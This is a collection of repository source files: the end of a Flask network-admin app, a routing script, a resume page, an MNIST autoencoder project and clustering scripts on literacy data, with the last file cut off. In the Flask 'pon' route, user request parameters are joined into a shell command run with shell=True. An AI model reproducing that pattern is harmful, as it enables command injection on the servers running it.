request.form.get('network')\n group = request.form.get('group')\n desc = request.form.get('desc')\n\n v = VlanInfo.query.filter(VlanInfo.id == id).first()\n v.vlanid = vlanid\n v.vlanname = vlanname\n v.network = network\n v.group = group\n v.desc = desc\n db.session.commit()\n\n return redirect(url_for('vinfo'))\n\n\n\n\n\n\n#OLT_INFO\n\[email protected](\"/olt/pon/\",methods = ['POST', 'GET'])\ndef pon():\n\n port = request.args.get('port')\n vlan = request.args.get('vlan')\n\n try:\n command_success = 'python scripts/olt.py' \n result = subprocess.check_output(\n [command_success], shell=True)\n except:\n pass\n\n try:\n if len(port) > 0 and len(vlan) > 0:\n flash('ONU Successfully Registered')\n command_success2 = 'python scripts/pon.py' + ' ' + str(port) + ' ' + str(vlan)\n result2 = subprocess.check_output(\n [command_success2], shell=True)\n except:\n pass\n return render_template('olt.html', result=result)\n\[email protected]('/switch-vlan')\ndef svlan():\n\n return render_template('switch-vlan.html', title='SVlan')\n\n"
},
{
"alpha_fraction": 0.48736461997032166,
"alphanum_fraction": 0.7111913561820984,
"avg_line_length": 45.16666793823242,
"blob_id": "a873ecc64aaa5268230413a52bcedf1744526fc3",
"content_id": "91da5cc8c6619f3c2145dbd6d80c4ac756aea93d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 277,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 6,
"path": "/scripts/add_networks.sh",
"repo_name": "YatskoGrigoriy/MyFlaskBlog",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\nPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin\nroute del default gw 172.1.2.1\nip route add 10.3.1.0/24 via 172.1.2.1 dev ens192\nip route add 10.4.1.0/24 via 172.1.2.1 dev ens192\nip route add 10.5.1.0/24 via 172.1.2.1 dev ens192\n"
},
{
"alpha_fraction": 0.6877551078796387,
"alphanum_fraction": 0.7076190710067749,
"avg_line_length": 37.08290100097656,
"blob_id": "c10f484e5dea9a57805b832de7b585487e51d8b2",
"content_id": "b3ad7930f0613ed4ce78cc90bdaca3dd93d37f6d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 7376,
"license_type": "no_license",
"max_line_length": 451,
"num_lines": 193,
"path": "/templates/resume.html",
"repo_name": "YatskoGrigoriy/MyFlaskBlog",
"src_encoding": "UTF-8",
"text": "<div class=\"container\">\n<link href=\"../static/css/resume.css\" rel=\"stylesheet\">\n<div class=\"wrapper\">\n<div class=\"sidebar-wrapper\">\n<div class=\"profile-container\">\n<img class=\"img-rounded\" src=\"../static/img/profile.png\" alt=\"\" />\n<h1 class=\"name\">Yatsko Grigoriy</h1>\n<h3 class=\"tagline\">DevOps, System Administrator, Network Engineer</h3>\n</div>\n<div class=\"contact-container container-block\">\n<ul class=\"list-unstyled contact-list\">\n<li class=\"email\"><i class=\"fa fa-envelope\"></i><a href=\"mailto: [email protected]\"><span class=\"\">[email protected]</span></a></li>\n<li class=\"website\"><i class=\"fa fa-globe\"></i><a href=\"https://grin.golden.net.ua\">grin.golden.net.ua</a></li>\n<li class=\"linkedin\"><i class=\"fa fa-linkedin\"></i><a href=\"https://ua.linkedin.com/in/яцко-григорий-8101359b\">ua.linkedin.com/in/яцко-григорий-8101359b</a></li>\n<li class=\"github\"><i class=\"fa fa-github\"></i><a href=\"https://github.com/YatskoGrigoriy/\">github.com/YatskoGrigoriy/</a></li>\n<li class=\"twitter\"><i class=\"fa fa-facebook\"></i><a href=\"https://www.facebook.com/people/Yatsko-Grigory/100004234628516\">facebook.com/people/Yatsko-Grigory/</a></li>\n</ul>\n</div>\n<div class=\"education-container container-block\">\n<h2 class=\"container-block-title\">Education</h2>\n<div class=\"item\">\n<h4 class=\"degree\">Specialist of Computer Systems and Networks</h4>\n<h5 class=\"meta\">National Telecomunication University of Ukraine 'Kyiv Department of Software Engineering'</h5>\n<div class=\"time\"> 2020-202*</div>\n</div>\n</div>\n<div class=\"language-container container-block\">\n<h2 class=\"container-block-title\">Languages</h2>\n<ul class=\"list-unstyled interests-list\">\n<li>English <span class=\"lang-desc\">(Basic)</span></li>\n<li>Ukrainian <span class=\"lang-desc\">(Native)</span></li>\n<li>Russian <span class=\"lang-desc\">(Professional)</span></li>\n</ul>\n</div>\n<div class=\"interests-container container-block\">\n<h2 class=\"container-block-title\">Interests</h2>\n<ul class=\"list-unstyled interests-list\">\n<li>Archery</li>\n<li>Fantasy and sci-fi</li>\n<li>Homelab</li>\n<li>#Monitoringlove</li>\n <li>Computer games</li>\n</ul>\n</div>\n</div>\n<div class=\"main-wrapper\">\n<section class=\"section summary-section\">\n<h2 class=\"section-title\"><i class=\"fa fa-user\"></i>Career Profile</h2>\n<div class=\"summary\">\n<p>\n I’m IT specialist with almost 10 years of expirience in networking, system administration and devops areas.\n I worked as Network Operations Center Engineer in different ISP’s in Ukraine and was in core team of company which is in top 10 Ukrainian ISP’s.\n Nowadays I’m working as DevOps Engineer for 4 years in Berlin based companies.\n I’m trying to use all best practices of infrastructure as a code and automation in my everyday work.\n</p>\n</div>\n</section>\n<section class=\"section experiences-section\">\n<h2 class=\"section-title\"><i class=\"fa fa-briefcase\"></i>Experiences</h2>\n<div class=\"item\">\n<div class=\"meta\">\n<div class=\"upper-row\">\n<h3 class=\"job-title\">DevOps Engineer</h3>\n<div class=\"time\">December 2018 - Present</div>\n</div>\n<div class=\"company\">GoldenNet ISP., Kyiv</div>\n</div>\n<div class=\"details\">\n<p></p>\n</div>\n</div>\n<div class=\"item\">\n<div class=\"meta\">\n<div class=\"upper-row\">\n<h3 class=\"job-title\">Network/System Administrator</h3>\n<div class=\"time\">April 2015 - July 2018</div>\n</div>\n<div class=\"company\">Eurolan ISP., Kyiv</div>\n</div>\n<div class=\"details\">\n<p></p>\n</div>\n</div>\n</section>\n<section class=\"section projects-section\">\n<h2 class=\"section-title\"><i class=\"fa fa-archive\"></i>Projects</h2>\n<div class=\"intro\">\n<p><strong>List of interesting projects happened in my life.</strong></p>\n</div>\n<div class=\"item\">\n<span class=\"project-title\"><a href=\"https://kyivstar.ua/uk/mm\">GoldenFiber Network (at the moment JSC Kyivstar)</a></span> - <span class=\"project-tagline\">In 2007 I was responsible for infrastructure planning and integration for GoldenFiber company (at the moment it is acquired by JSC ‘Kyivstar’). Together with our team we built their network in Kyiv and implemented solutions that helped to build redundant network for this ISP.</span>\n</div>\n<div class=\"item\">\n<span class=\"project-title\"><a href=\"https://skif.com.ua/\">Skif ISP / Domashka.net Billing system</a></span> - <span class=\"project-tagline\">Integrated several payment systems and improved customers expirience with new features: bonus system, payments with bonus points etc.</span>\n</div>\n<div class=\"item\">\n<span class=\"project-title\"><a href=\"https://www.bklieferservice.de/\">Burger King Lieferservice</a></span> - <span class=\"project-tagline\">As an empoyee of DeliveryHero AG I was supporting and improving infrastructure for Burger King platform. It used AWS resources (CloudFormation, ELB, EC2, SNS, SQS etc), Puppet, Jenkins and ELK.</span>\n</div>\n<div class=\"item\">\n<span class=\"project-title\"><a href=\"https://github.com/l13t/pyWBacula\">pyWBacula</a></span> - <span class=\"project-tagline\">Python-based web interface with report that helps you to investigate your backups on different parameters.</span>\n</div>\n<div class=\"item\">\n<span class=\"project-title\"><a href=\"https://exchange.icinga.com/l13t/\">Icinga2 plugins</a></span> - <span class=\"project-tagline\">Different Icinga2/Nagios plugins on Icinga2 Exchange portal</span>\n</div>\n</section>\n<section class=\"skills-section section\">\n<h2 class=\"section-title\"><i class=\"fa fa-rocket\"></i>Skills & Proficiency</h2>\n<div class=\"skillset\">\n<div class=\"item\">\n<h3 class=\"level-title\">Linux OS family</h3>\n<div class=\"level-bar\">\n<div class=\"level-bar-inner\" data-level=\"95%\">\n</div>\n</div>\n</div>\n<div class=\"item\">\n<h3 class=\"level-title\">Databases</h3>\n<div class=\"level-bar\">\n<div class=\"level-bar-inner\" data-level=\"75%\">\n</div>\n</div>\n</div>\n<div class=\"item\">\n<h3 class=\"level-title\">Monitoring: Icinga2, Zabbix, Prometheus etc</h3>\n<div class=\"level-bar\">\n<div class=\"level-bar-inner\" data-level=\"95%\">\n</div>\n</div>\n</div>\n<div class=\"item\">\n<h3 class=\"level-title\">Virtualization</h3>\n<div class=\"level-bar\">\n<div class=\"level-bar-inner\" data-level=\"80%\">\n</div>\n</div>\n</div>\n<div class=\"item\">\n<h3 class=\"level-title\">Containerization</h3>\n<div class=\"level-bar\">\n<div class=\"level-bar-inner\" data-level=\"75%\">\n</div>\n</div>\n</div>\n<div class=\"item\">\n<h3 class=\"level-title\">CI/CD</h3>\n<div class=\"level-bar\">\n<div class=\"level-bar-inner\" data-level=\"75%\">\n</div>\n</div>\n</div>\n<div class=\"item\">\n<h3 class=\"level-title\">System automation with SaltStack</h3>\n<div class=\"level-bar\">\n<div class=\"level-bar-inner\" data-level=\"85%\">\n</div>\n</div>\n</div>\n<div class=\"item\">\n<h3 class=\"level-title\">System automation with Puppet</h3>\n<div class=\"level-bar\">\n<div class=\"level-bar-inner\" data-level=\"55%\">\n</div>\n</div>\n</div>\n<div class=\"item\">\n<h3 class=\"level-title\">System automation with Ansible</h3>\n<div class=\"level-bar\">\n<div class=\"level-bar-inner\" data-level=\"65%\">\n</div>\n</div>\n</div>\n<div class=\"item\">\n<h3 class=\"level-title\">VoIP</h3>\n<div class=\"level-bar\">\n<div class=\"level-bar-inner\" data-level=\"70%\">\n</div>\n</div>\n</div>\n<div class=\"item\">\n<h3 class=\"level-title\">Network Administration</h3>\n<div class=\"level-bar\">\n<div class=\"level-bar-inner\" data-level=\"90%\">\n</div>\n</div>\n</div>\n</div>\n</section>\n</div>\n</div>\n\n<script src=\"https://ajax.cloudflare.com/cdn-cgi/scripts/7089c43e/cloudflare-static/rocket-loader.min.js\" defer=\"\"></script>\n\n</div>\n"
}
] | 14 |
mathurpulkit/Vanilla-Autoencoders | https://github.com/mathurpulkit/Vanilla-Autoencoders | 7101c8dcc4e4832824672a2421dc3c773eef6252 | 8610ecc10baae7e6af4b3b947e3f74f86b2916f4 | 7486d886fe748da0496d11f432a2c1a7bb965fa1 | refs/heads/main | 2023-02-05T15:33:22.198595 | 2020-12-23T14:29:33 | 2020-12-23T14:29:33 | 323,871,659 | 2 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6159999966621399,
"alphanum_fraction": 0.6159999966621399,
"avg_line_length": 24,
"blob_id": "1e9e3d21e609317c675ef8938c30dc1a8198824a",
"content_id": "b45e69d80fb46e11908eeb8f572ccb383896b733",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 250,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 10,
"path": "/main.py",
"repo_name": "mathurpulkit/Vanilla-Autoencoders",
"src_encoding": "UTF-8",
"text": "import fc\nimport cnn\nprint(\"Welcome to Autoencoders! Please select your choice: \")\nprint(\"a. FC based\")\nprint(\"b. CNN based\")\nans = input(\"Enter your choice: \")\nif ans == 'a' or ans == 'A':\n fc.main()\nelif ans == 'b' or ans == 'B':\n cnn.main()\n"
},
{
"alpha_fraction": 0.5712187886238098,
"alphanum_fraction": 0.5964268445968628,
"avg_line_length": 32.21138381958008,
"blob_id": "eb380d9fb9933c0258ea9037c1e1c00162473d32",
"content_id": "6dd053ea466f3a412ef3cd34330aec46fa1256cc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4086,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 123,
"path": "/cnn.py",
"repo_name": "mathurpulkit/Vanilla-Autoencoders",
"src_encoding": "UTF-8",
"text": "import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport processdata\nimport matplotlib.pyplot as plt\nimport numpy\nimport cv2\n\n# constants\nlr = 0.0008\nepoch = 8\nbatchsize = 64\nimgcheck = 1000 # Checks for that image's index in the test set(0-9999)\n# use imgcheck b/w 0-9990 because it shows 10 images starting from index of imgcheck\nmodelname = \"cnn2.pt\"\n\n\ndef read_data():\n traindata = processdata.read_input_cnn()\n print(\"Train data size is: \", traindata.shape[0]) # shows number of images in train set\n return traindata\n\n\nclass Network(nn.Module):\n def __init__(self):\n super(Network, self).__init__()\n self.l1 = nn.Conv2d(1, 8, 6, 2)\n self.l2 = nn.Conv2d(8, 32, 4, 4, 2)\n\n self.l3 = nn.Flatten() # Flattened into a 256-D vector\n self.bottle = nn.Linear(512, 200)\n self.fc2 = nn.Linear(200, 512)\n\n self.rl1 = nn.ConvTranspose2d(32, 8, 4, 4, 2)\n self.rl2 = nn.ConvTranspose2d(8, 1, 6, 2)\n return\n\n def forward(self, x):\n x = x.unsqueeze(1)\n x = F.relu(self.l1(x))\n x = F.relu(self.l2(x))\n\n x = self.l3(x)\n x = F.relu(self.bottle(x))\n x = F.relu(self.fc2(x))\n x = x.reshape((-1, 32, 4, 4))\n\n x = F.relu(self.rl1(x))\n x = torch.sigmoid(self.rl2(x))\n return x\n\n\ndef dec_network(traindata): # declare network\n net = Network()\n net.double() # prevents an error\n loss_func = nn.MSELoss()\n optimizer = optim.Adam(net.parameters(), lr=lr)\n pred = net(traindata)\n loss = loss_func(pred.squeeze(), traindata)\n print(\"Initial Loss is \" + str(loss.item()))\n return net, optimizer, loss_func, loss.item()\n\n\ndef fit(net, traindata, optimizer, loss_func, loss_init):\n loss_batch = []\n loss_epoch = [loss_init]\n for i in range(epoch):\n for j in range(int(traindata.shape[0]/batchsize)):\n x_batch = traindata[j*batchsize:(j+1)*batchsize]\n optimizer.zero_grad()\n pred = net(x_batch)\n loss = loss_func(pred.squeeze(), x_batch)\n loss_batch.append(loss.item())\n loss.backward() # model learns by backpropagation\n optimizer.step() # model updates its parameters\n if (j+1) % 100 == 0:\n print(\"EPOCH No: \", i+1, \" \", (j+1), \" Batches done\")\n pred = net(traindata)\n loss = loss_func(pred.squeeze(), traindata)\n loss_epoch.append(loss.item())\n print(\"Loss after EPOCH No \" + str(i+1) + \": \" + str(loss.item())) # prints loss\n del loss\n return loss_epoch, loss_batch\n\n\n\n\ndef main():\n traindata = read_data()\n net, optimizer, loss_func, loss_init = dec_network(traindata)\n need_train = input(\"Enter 'm' to train model, anything else to load old model: \")\n if need_train == 'm' or need_train == 'M':\n loss_epoch, loss_batch = fit(net, traindata, optimizer, loss_func, loss_init)\n processdata.plot_graph(loss_epoch, loss_batch)\n need_save = input(\"Enter 's' to save model, anything else to not save: \")\n if need_save == 's' or need_save == 'S':\n print(\"Saving Model...\")\n torch.save(net.state_dict(), modelname)\n else:\n net.load_state_dict(torch.load(modelname))\n testdata = processdata.read_input_cnn('testdata.idx3')\n print(\"Original images are: \")\n img = numpy.asarray(testdata[imgcheck].squeeze())\n for i in range(1, 10):\n pic = numpy.asarray(testdata[imgcheck + i].squeeze())\n img = cv2.hconcat([img, pic])\n plt.axis('off')\n plt.imshow(img, cmap='Greys_r')\n plt.show()\n pred = net(testdata)\n loss = loss_func(pred.squeeze(), testdata)\n print(\"Final Loss on Test set is: \" + str(loss.item()))\n print(\"Regenerated images are: \")\n img = pred[imgcheck].squeeze().detach().numpy()\n for i in range(1, 10):\n pic = pred[imgcheck+i].squeeze().detach().numpy()\n img = cv2.hconcat([img, pic])\n img = img.squeeze()\n plt.axis('off')\n plt.imshow(img, cmap='Greys_r')\n plt.show()\n return\n\n"
},
{
"alpha_fraction": 0.6724941730499268,
"alphanum_fraction": 0.688811182975769,
"avg_line_length": 27.600000381469727,
"blob_id": "9eb312a3cb6fdf06beac89891ad99ac1e7748ef7",
"content_id": "7ba7683b208a262efae6c59c8ecb217d3e2580db",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 858,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 30,
"path": "/processdata.py",
"repo_name": "mathurpulkit/Vanilla-Autoencoders",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport idx2numpy\nimport matplotlib.pyplot as plt\nimport torch\n\n\ndef read_input_fc(ifilename = \"traindata.idx3\"): #reads img file and label files and returns arrays\n images = idx2numpy.convert_from_file(ifilename) # variable will store images in 3-D array\n imgdata = np.reshape(images, newshape=[images.shape[0], -1])/255\n imgdata = torch.from_numpy(imgdata)\n return imgdata\n\ndef read_input_cnn(ifilename = \"traindata.idx3\"):\n images = idx2numpy.convert_from_file(ifilename)\n images = images/255\n images = torch.from_numpy(images)\n return images\n\ndef plot_graph(loss_epoch, loss_batch):\n plt.plot(loss_epoch)\n plt.ylabel(\"Loss\")\n plt.xlabel(\"No of EPOCHS\")\n plt.show()\n plt.clf()\n plt.plot(loss_batch)\n plt.ylabel(\"Loss\")\n plt.xlabel(\"No of Batches\")\n plt.show()\n plt.clf()\n return\n"
},
{
"alpha_fraction": 0.5819777846336365,
"alphanum_fraction": 0.6049574017524719,
"avg_line_length": 33.87387466430664,
"blob_id": "092790b3dd9caa51fb82532c290a0b4e95049977",
"content_id": "7d71799b18803a80b333779ce83e3f8866092ba3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3873,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 111,
"path": "/fc.py",
"repo_name": "mathurpulkit/Vanilla-Autoencoders",
"src_encoding": "UTF-8",
"text": "import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport processdata\nimport matplotlib.pyplot as plt\nimport numpy\nimport cv2\n\n# constants\nlr = 0.004\nepoch = 5\nbatchsize = 32\nimgcheck = 3000 # Checks for that image's index in the test set(0-9999)\n# use imgcheck b/w 0-9990 because it shows 10 images starting from index of imgcheck\nmodelname = \"fc.pt\"\n\ndef read_data():\n traindata = processdata.read_input_fc()\n print(\"Train data size is: \", traindata.shape[0]) # shows number of images in train set\n return traindata\n\n\nclass Network(nn.Module):\n def __init__(self):\n super(Network, self).__init__()\n self.fc1 = nn.Linear(784, 400)\n self.fc2 = nn.Linear(400, 100)\n self.fc3 = nn.Linear(100, 400)\n self.fc4 = nn.Linear(400, 784)\n return\n\n def forward(self, x):\n x = self.fc1(x)\n x = F.relu(x)\n x = self.fc2(x) # Linear Activation instead of ReLU for bottleneck layer\n x = self.fc3(x)\n x = F.relu(x)\n x = self.fc4(x)\n x = torch.sigmoid(x)\n return x\n\ndef dec_network(traindata): # declare network\n net = Network()\n net.double() # prevents an error\n loss_func = nn.MSELoss()\n optimizer = optim.Adam(net.parameters(), lr=lr)\n pred = net(traindata)\n loss = loss_func(pred, traindata)\n print(\"Initial Loss is \" + str(loss.item()))\n return net, optimizer, loss_func, loss.item()\n\n\ndef fit(net, traindata, optimizer, loss_func, loss_init):\n loss_batch = []\n loss_epoch = [loss_init]\n for i in range(epoch):\n for j in range(int(traindata.shape[0]/batchsize)):\n x_batch = traindata[j*batchsize:(j+1)*batchsize]\n optimizer.zero_grad()\n pred = net(x_batch)\n loss = loss_func(pred, x_batch)\n loss_batch.append(loss.item())\n loss.backward() # model learns by backpropagation\n optimizer.step() # model updates its parameters\n if (j+1) % 100 == 0:\n print(\"EPOCH No: \", i+1, \" \", (j+1), \" Batches done\")\n pred = net(traindata)\n loss = loss_func(pred.squeeze(), traindata)\n loss_epoch.append(loss.item())\n print(\"Loss after EPOCH No \" + str(i+1) + \": \" + str(loss.item())) # prints loss\n return loss_epoch, loss_batch\n\n\n\ndef main():\n traindata = read_data()\n net, optimizer, loss_func, loss_init = dec_network(traindata)\n need_train = input(\"Enter 'm' to train model, anything else to load old model: \")\n if need_train == 'm' or need_train == 'M':\n loss_epoch, loss_batch = fit(net, traindata, optimizer, loss_func, loss_init)\n processdata.plot_graph(loss_epoch, loss_batch)\n need_save = input(\"Enter 's' to save model, anything else to not save: \")\n if need_save == 's' or need_save == 'S':\n print(\"Saving Model...\")\n torch.save(net.state_dict(), modelname)\n else:\n net.load_state_dict(torch.load(modelname))\n testdata = processdata.read_input_cnn('testdata.idx3')\n print(\"Original images are: \")\n img = numpy.asarray(testdata[imgcheck].squeeze())\n for i in range(1, 10):\n pic = numpy.asarray(testdata[imgcheck + i].squeeze())\n img = cv2.hconcat([img, pic])\n plt.axis('off')\n plt.imshow(img, cmap='Greys_r')\n plt.show()\n pred = net(testdata.reshape(-1, 784))\n loss = loss_func(pred.squeeze(), testdata.reshape(-1, 784))\n print(\"Final Loss on Test set is: \" + str(loss.item()))\n print(\"Regenerated images are: \")\n pred = pred.reshape(-1, 28, 28)\n img = pred[imgcheck].squeeze().detach().numpy()\n for i in range(1, 10):\n pic = pred[imgcheck + i].squeeze().detach().numpy()\n img = cv2.hconcat([img, pic])\n img = img.squeeze()\n plt.axis('off')\n plt.imshow(img, cmap='Greys_r')\n plt.show()\n return\n\n\n"
},
{
"alpha_fraction": 0.7083333134651184,
"alphanum_fraction": 0.7083333134651184,
"avg_line_length": 38.95833206176758,
"blob_id": "4c9bcab18c78d43c241bb11aa265652aba3f3626",
"content_id": "223861fdedb0ec0bf1e52745d9b3d4e272202805",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 960,
"license_type": "no_license",
"max_line_length": 135,
"num_lines": 24,
"path": "/README.md",
"repo_name": "mathurpulkit/Vanilla-Autoencoders",
"src_encoding": "UTF-8",
"text": "# Autoencoders MNIST Project\n\n#### This is a repository demonstrating a vanilla Autoencoder using MNIST dataset.\n\n#### Autoencoders are used for creating a compressed representation of the given data while retaining the original quality of the data.\n\n#### Here are some examples generated using the model given in code:\n\nNetwork Type | Fully Connected Layers | Convolution Neural Networks\n:----------------|----------------|----------------:\nOriginal |  | \nReconstructed |  | \n\n#### Here are the Loss graphs for Fully connected Layers:\n\n\n\n\n\n#### Here are the Loss graphs for Convolutional Neural Networks:\n\n\n\n\n\n"
}
] | 5 |
abuzarbagewadi/SummerProject1 | https://github.com/abuzarbagewadi/SummerProject1 | dde090c1b8660150ab21b6d38cbf9e1b9d0711fb | 0b34e336bdb28b155622b7c21514881308507a7a | 1f59afcd90cefb8a4abd38278855a7ad6c0cdd2c | refs/heads/master | 2022-11-13T09:22:11.174486 | 2020-06-28T08:55:39 | 2020-06-28T08:55:39 | 268,112,720 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.8383838534355164,
"alphanum_fraction": 0.8484848737716675,
"avg_line_length": 48,
"blob_id": "d3d7dfb4275f43a8bf43c798725aee7a65925488",
"content_id": "33d0272860eb0fd9aab5945b8a19bbbf6b32a298",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 99,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 2,
"path": "/README.md",
"repo_name": "abuzarbagewadi/SummerProject1",
"src_encoding": "UTF-8",
"text": "# SummerProject1\nMachine Learning model predicting educated people in various areas accross India \n"
},
{
"alpha_fraction": 0.6674132347106934,
"alphanum_fraction": 0.6998879909515381,
"avg_line_length": 28.27118682861328,
"blob_id": "022ba9976a6e525745c3f8b5ef1f7cac96cd3f3a",
"content_id": "7fdb1ef0c843b49950ab34f38b87cc9b5024327b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1786,
"license_type": "no_license",
"max_line_length": 97,
"num_lines": 59,
"path": "/Final _MULTIReg.py",
"repo_name": "abuzarbagewadi/SummerProject1",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat May 30 20:30:20 2020\r\n\r\n@author: Admin\r\n\"\"\"\r\n\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\nSpyder Editor\r\n\r\nThis is a temporary script file.\r\n\"\"\"\r\n# Multiple Linear Regression\r\n\r\n# Importing the libraries\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\n\r\n# Importing the dataset\r\ndataset = pd.read_csv('latestedu.csv')\r\nX = dataset.iloc[:, :-1].values\r\ny = dataset.iloc[:, 28].values\r\n\r\n# Taking care of missing data\r\nfrom sklearn.impute import SimpleImputer\r\nimputer = SimpleImputer(missing_values=np.nan, strategy='mean')\r\nimputer.fit(X[:, 1:29])\r\nX[:, 1:28] = imputer.transform(X[:, 1:28])\r\n\r\n\"\"\"\r\n# Encoding categorical data\r\nfrom sklearn.compose import ColumnTransformer\r\nfrom sklearn.preprocessing import OneHotEncoder\r\nct = ColumnTransformer(transformers=[('encoder', OneHotEncoder(), [3])], remainder='passthrough')\r\nX = np.array(ct.fit_transform(X))\r\nprint(X) \"\"\"\r\n\r\n# Splitting the dataset into the Training set and Test set\r\nfrom sklearn.model_selection import train_test_split\r\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 0)\r\n\r\n# Training the Multiple Linear Regression model on the Training set\r\nfrom sklearn.linear_model import LinearRegression\r\nregressor = LinearRegression()\r\nregressor.fit(X_train, y_train)\r\n\r\n# Predicting the Test set results\r\ny_pred = regressor.predict(X_test)\r\nnp.set_printoptions(precision=2)\r\nprint(np.concatenate((y_pred.reshape(len(y_pred),1), y_test.reshape(len(y_test),1)),1))\r\n\r\n#using backward elimination\r\nimport statsmodels.api as sm\r\nX = np.append(arr = np.ones((590, 1)).astype(int), values = X, axis = 1)\r\nX_opt = X[:, [8,10,11,12,13,14,15,20,21,27]]\r\nregressor_OLS =sm.OLS(endog = y, exog = X_opt).fit()\r\nregressor_OLS.summary()\r\n"
},
{
"alpha_fraction": 0.5934135317802429,
"alphanum_fraction": 0.6364787817001343,
"avg_line_length": 31.595745086669922,
"blob_id": "bd2429f44d1bdb69c0b25fe495eaeb92933bf949",
"content_id": "c0e63187e12ede143b2bf1efcfcfa000bff14afc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1579,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 47,
"path": "/KMeaClust(LiteracyVSPersonsPerInstitution).py",
"repo_name": "abuzarbagewadi/SummerProject1",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun May 31 00:12:59 2020\r\n\r\n@author: Admin\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\n\r\ndataset = pd.read_csv('latestedu.csv')\r\nX = dataset.iloc[:, [23, 30]].values\r\n\r\nfrom sklearn.impute import SimpleImputer\r\nimputer = SimpleImputer(missing_values=np.nan, strategy='mean')\r\nimputer.fit(X[:, 1:32])\r\nX[:, 1:32] = imputer.transform(X[:, 1:32])\r\n\r\n\r\n\r\nfrom sklearn.cluster import KMeans\r\nwcss = []\r\nfor i in range(1, 11):\r\n kmeans = KMeans(n_clusters = i, init = 'k-means++', random_state = 0)\r\n kmeans.fit(X)\r\n wcss.append(kmeans.inertia_)\r\nplt.plot(range(1, 11), wcss)\r\nplt.title('The Elbow Method')\r\nplt.xlabel('Number of clusters')\r\nplt.ylabel('WCSS')\r\nplt.show()\r\n\r\nkmeans = KMeans(n_clusters = 4, init = 'k-means++', random_state = 0)\r\ny_kmeans = kmeans.fit_predict(X)\r\n\r\n\r\nplt.scatter(X[y_kmeans == 0, 0], X[y_kmeans == 0, 1], s = 100, c = 'red', label = 'Significant Increase in Budget')\r\nplt.scatter(X[y_kmeans == 1, 0], X[y_kmeans == 1, 1], s = 100, c = 'blue', label = 'Considerable Increase in Budget')\r\nplt.scatter(X[y_kmeans == 2, 0], X[y_kmeans == 2, 1], s = 100, c = 'green', label = 'Moderate increase n Budget')\r\nplt.scatter(X[y_kmeans == 3, 0], X[y_kmeans == 3, 1], s = 100, c = 'cyan', label = 'Low increase in Budget')\r\nplt.scatter(kmeans.cluster_centers_[:, 0], kmeans.cluster_centers_[:, 1], s = 300, c = 'yellow', label = 'Centroids')\r\nplt.title('Population of Education')\r\nplt.xlabel('Literacy Rate')\r\nplt.ylabel('Persons per Institution')\r\nplt.legend()\r\nplt.show()\r\n"
},
{
"alpha_fraction": 0.6090909242630005,
"alphanum_fraction": 0.6495867967605591,
"avg_line_length": 26.13953399658203,
"blob_id": "b22db79de0d2bf04238af8354d47b019f85a3e62",
"content_id": "4cea195149b4912d1bd284428fb1db6011655bfc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1210,
"license_type": "no_license",
"max_line_length": 101,
"num_lines": 43,
"path": "/H_Clust(LiteracyVSPersonsPerInstitution).py",
"repo_name": "abuzarbagewadi/SummerProject1",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Jun 10 14:18:28 2020\r\n\r\n@author: Admin\r\n\"\"\"\r\n\r\n\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\n\r\n\r\ndataset = pd.read_csv('UpdatedDataset1.csv')\r\nX = dataset.iloc[:, [23, 30]].values\r\n\r\n\r\nfrom sklearn.impute import SimpleImputer\r\nimputer = SimpleImputer(missing_values=np.nan, strategy='mean')\r\nimputer.fit(X[:, 0:34])\r\nX[:, 0:34] = imputer.transform(X[:, 0:34])\r\n\r\n\r\nimport scipy.cluster.hierarchy as sch\r\ndendrogram = sch.dendrogram(sch.linkage(X, method = 'ward'))\r\nplt.title('Dendrogram')\r\nplt.xlabel('Literacy')\r\nplt.ylabel('Euclidean distances')\r\nplt.show()\r\n\r\nfrom sklearn.cluster import AgglomerativeClustering\r\nhc = AgglomerativeClustering(n_clusters = 3, affinity = 'euclidean', linkage = 'ward')\r\ny_hc = hc.fit_predict(X)\r\n\r\nplt.scatter(X[y_hc == 0, 0], X[y_hc == 0, 1], s = 100, c = 'red', label = 'Very Low Literacy')\r\nplt.scatter(X[y_hc == 1, 